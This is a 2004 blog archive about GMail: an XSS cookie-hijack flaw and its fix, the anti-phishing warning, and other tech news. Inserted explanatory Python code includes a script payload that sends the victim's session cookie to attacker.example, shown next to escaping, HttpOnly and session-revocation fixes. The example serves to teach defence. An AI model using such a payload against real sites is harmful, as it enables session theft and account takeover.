Archive for October, 2004

GMail Security Flaw Fixed

Well, you have to give Google credit. They certainly turned this one around quickly. Per my post yesterday evening:

An Israeli publication, Nana Net Life, broke the news that a simple XSS exploit can be used to gain access to your GMail account. The exploit was not explained specifically but in the most general terms, it seems that a hacker hijacks your GMail cookie when you follow a special link that has been set up to grab your cookie. Once your cookie is captured, a hacker then has access to your GMail account and changing your password has no effect. Workarounds? I think that not checking the autologin for 2 weeks button will safeguard your account.

According to InfoWorld, Google has now fixed the problem. [via InsideGoogle via theunofficialgoogleweblog]

Official GMail Bug List

In case anyone is interested, the official GMail bug list is available from Google here.

GMail Security Flaw Exposed

Well, not exposed in detail, but rather announced. An Israeli publication, Nana Net Life, broke the news that a simple XSS exploit can be used to gain access to your GMail account. The exploit was not explained specifically but in the most general terms, it seems that a hacker hijacks your GMail cookie when you follow a special link that has been set up to grab your cookie. Once your cookie is captured, a hacker then has access to your GMail account and changing your password has no effect. Workarounds? I think that not checking the autologin for 2 weeks button will safeguard your account.

Update: The exploit involves an XSS (cross-site scripting) attack. You can read more about XSS exploits here via Whovian commenting on a Slashdot article regarding the bug.

Google is reported to be working to resolve the security bug as quickly as possible.
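As an added example (not GMail's code and not from the original post), the following models the general mechanism described above: a page that echoes untrusted input into HTML lets a crafted link run script in the victim's browser, that script can read the session cookie, and a stolen cookie stays valid for as long as the server honours it. It places the vulnerable rendering beside the escaped one, and a session store that either ignores a password change (the behaviour the post describes) or revokes the user's sessions. The endpoint, cookie name and attacker host are hypothetical; the payload is a constructed illustration, not the actual link used against GMail.

```python
"""Added example (not GMail's code, not from the original post): how a
reflected XSS bug leaks a session cookie, and the two server-side measures
that blunt it. Endpoint, cookie and domain names here are hypothetical."""
import html
import secrets


def render_search_vulnerable(query: str) -> str:
    """Hypothetical search page that echoes the query straight into HTML."""
    return f"<p>Results for: {query}</p>"


def render_search_fixed(query: str) -> str:
    """Same page, with the query encoded for the HTML text context first."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# Constructed attacker payload: what a "special link" would carry. In a
# browser it makes the victim send document.cookie to the attacker's host.
XSS_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/c?"'
    "+encodeURIComponent(document.cookie)</script>"
)


def contains_script_element(rendered: str) -> bool:
    """True if the page as delivered contains a live <script> element."""
    return "<script>" in rendered.lower()


class SessionStore:
    """Server-side sessions: session id -> (username, password version).

    The credential update itself is left out; only its effect on existing
    sessions is modelled.
    """

    def __init__(self) -> None:
        self._sessions: dict[str, tuple[str, int]] = {}
        self._pw_version: dict[str, int] = {}

    def login(self, username: str) -> str:
        sid = secrets.token_urlsafe(32)
        version = self._pw_version.setdefault(username, 0)
        self._sessions[sid] = (username, version)
        return sid

    @staticmethod
    def set_cookie_header(sid: str) -> str:
        # HttpOnly keeps document.cookie from seeing the id, so the payload
        # above exfiltrates nothing; Secure keeps it off plaintext HTTP.
        return f"Set-Cookie: SID={sid}; Path=/; Secure; HttpOnly"

    def resolve(self, sid: str):
        # A session is live only if it was issued under the user's current
        # password version. Without that check a stolen id works until the
        # server-side expiry, however the victim obtained it.
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        username, version = entry
        return username if version == self._pw_version[username] else None

    def change_password(self, username: str, revoke_sessions: bool) -> None:
        # revoke_sessions=False reproduces the behaviour the post describes:
        # the password changes but the hijacked session keeps working.
        if revoke_sessions:
            self._pw_version[username] = self._pw_version.get(username, 0) + 1


if __name__ == "__main__":
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_fixed(XSS_PAYLOAD))
    store = SessionStore()
    sid = store.login("victim")
    store.change_password("victim", revoke_sessions=False)
    print("after password change, no revocation:", store.resolve(sid))
    store.change_password("victim", revoke_sessions=True)
    print("after password change, with revocation:", store.resolve(sid))
```

Two things follow from the model. Output encoding at the point where untrusted input meets HTML removes the injection; the HttpOnly flag removes the cookie from what injected script can read; and binding each session to a password version means a password change actually ends a hijacked session. Whether the cookie was persistent or per-session does not change any of this: a copied cookie is valid until the server stops honouring it.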

GMail Invite Sig

Here’s a neat little PHP script courtesy of Paul Shapiro that will generate a PNG file advertising the number of GMail invites in your account. Perfect for impressing all the GMail groupies in the forums.

Source: GMail Invite Sig

GMail Anti-Phishing Feature

This new feature of GMail has popped up over the past week and it is really annoying me.

Warning: This message may not be from whom it claims to be. Beware of following any links in it or of providing the sender with any personal information.

Movable Type sends me a note when someone leaves a comment and I have a link built into the note that allows me to quickly delete a comment or trackback ping if it is spam. The problem is that these emails are sent from my server as the user that leaves the comment and GMail notes this and disables all links in the email to “protect me.” Interestingly, the phishing detection does not trip on all the comment notifications sent from my server.

What we need is a REMOVE PROTECTION link in the same vein as the Display External Images link for emails that reference remote graphics. Even better, give me the ability to turn PHISHING detection off.
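As an added example (not Movable Type's or GMail's code), here is the shape of the problem and the usual fix: a notification whose From: header carries the commenter's address, sent from a server that has nothing to do with that address, is indistinguishable from a forged sender; putting the site's own address in From: and the commenter in Reply-To: keeps replies working while the sender matches the sending host. The "forged sender" check below is a constructed, simplified stand-in; Google has not published the rule its warning actually uses, and the site address and domain are hypothetical.

```python
"""Added example, not Movable Type's or GMail's code: why a comment
notification can look like a forged sender, and the Reply-To fix. The check
is a constructed simplification of what a mail provider might compare."""
from email.message import EmailMessage
from email.utils import parseaddr

SITE_ADDRESS = "blog@example.org"   # hypothetical: the server's own mailbox
SENDING_DOMAIN = "example.org"      # hypothetical: domain the server's MTA sends as


def notification_as_commenter(commenter: str, body: str) -> EmailMessage:
    """Notification sent 'as the user that leaves the comment'."""
    msg = EmailMessage()
    msg["From"] = commenter
    msg["To"] = SITE_ADDRESS
    msg["Subject"] = "New comment"
    msg.set_content(body)
    return msg


def notification_with_reply_to(commenter: str, body: str) -> EmailMessage:
    """Same notification; From is the site, the commenter goes in Reply-To."""
    msg = EmailMessage()
    msg["From"] = SITE_ADDRESS
    msg["Reply-To"] = commenter
    msg["To"] = SITE_ADDRESS
    msg["Subject"] = "New comment"
    msg.set_content(body)
    return msg


def from_domain(msg: EmailMessage) -> str:
    """Domain part of the From: header, lower-cased."""
    _, addr = parseaddr(str(msg["From"]))
    return addr.rpartition("@")[2].lower()

def looks_like_forged_sender(msg: EmailMessage, sending_domain: str) -> bool:
    """Constructed heuristic: flag when the From: domain is not the domain
    the message actually came from (what Received/SPF would reveal)."""
    return from_domain(msg) != sending_domain.lower()


if __name__ == "__main__":
    # Constructed sample: a comment from a visitor with a link back to the site.
    body = "New comment. Delete it: https://example.org/mt/delete?id=1"
    for build in (notification_as_commenter, notification_with_reply_to):
        msg = build("visitor@mail.example", body)
        print(build.__name__, "flagged:", looks_like_forged_sender(msg, SENDING_DOMAIN))
```

Under this simplified rule only the From: domain matters, so a commenter who happens to use an address at the site's own domain would not be flagged; the page does not establish whether that is why some of the real notifications pass. The fix costs nothing at the receiving end: mail clients honour Reply-To when answering, so a reply still goes to the commenter.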

Free IPOD: Sent to Vendor, Waiting on Product

Today I noticed that the status of my iPod order has changed to: Sent to Vendor, Waiting on Product. Looks like it will be arriving shortly.

I am currently working on the freeflatscreens.com offer. You can read more here.

GMail Drive 1.02 Released

GMail Drive 1.02 has been released. Per Bjarke, the new features include:

* “Send To” context menu
* Option to preserve filenames in attachments
* Option to use HTTPS only (secure)
* Cookies don’t interfere with GMail Notifier
* Proxy authentication support
* Several bugfixes

Bjarke also stated:

The new options are available in the Login dialog under the “More” button. It’s necessary to uninstall, reboot and reinstall - to replace the old version.

I encourage you to read the many comments and the summary before posting about something being broken: GMail Drive page. Most user issues have been documented and addressed already.

Google Desktop

Google has released Google Desktop - search for your Windows desktop. Results are presented in the traditional Google fashion using a web page but the data does not traverse the Internet. GD indexes common files such as Word, Excel, Powerpoint, plain text, HTML, and Outlook mail. GMail is not currently integrated.

Because of the presentation method it is a sure bet that AdWords will be integrated into the search results page real soon now.

See the announcement here.

Get the code from Google here.

Read a review at Search Engine News

Supreme Court Ignores RIAA

The Supreme Court refused to hear RIAA pouting over a lower court decision that overturned a portion of the DMCA the RIAA was using to unconstitutionally capture ISP user information. Now they have to file proper John Doe suits.

/rant on

We are truly blessed that we have organizations like the EFF, the ACLU, and the IJ to protect our rights. Sure, there have been times in the past when even I questioned some of the ACLU’s crusades but having now lived through the Patriot Act, the DMCA, and the current intellectual property war I realize that in calmer times you need to push the balance to the extreme. In this manner, we lose less in times such as these. Plus, then the infrastructure and the coffers exist to defend our liberties and rights when our liberties most need defending. Give often and give generously to these organizations. While you may disagree with one or another of their positions, they really do serve the greatest good - liberty.

To say that you don’t mind giving up a “little” of your liberty to live in a safer America is doing a great disservice to many millions of patriots that have given their lives for our freedoms. The reality is you will not be safer but you will be giving a victory to the terrorists. I would die for my freedoms - and yours. Can you say the same?

/rant off

XM Satellite Radio … Online

Uh… doesn’t this defeat the purpose of all those really expensive satellites? XM has announced XM Satellite Radio Online coming to a computer near you this month. At $7.99 I’d say there is some serious profit in there. $3.99 if you are a current XM subscriber. Of course, the XM PCR had these bases covered until XM caved to RIAA pressure. Fair use and technical innovation be damned. Good thing Tivo isn’t filled with spineless wussies.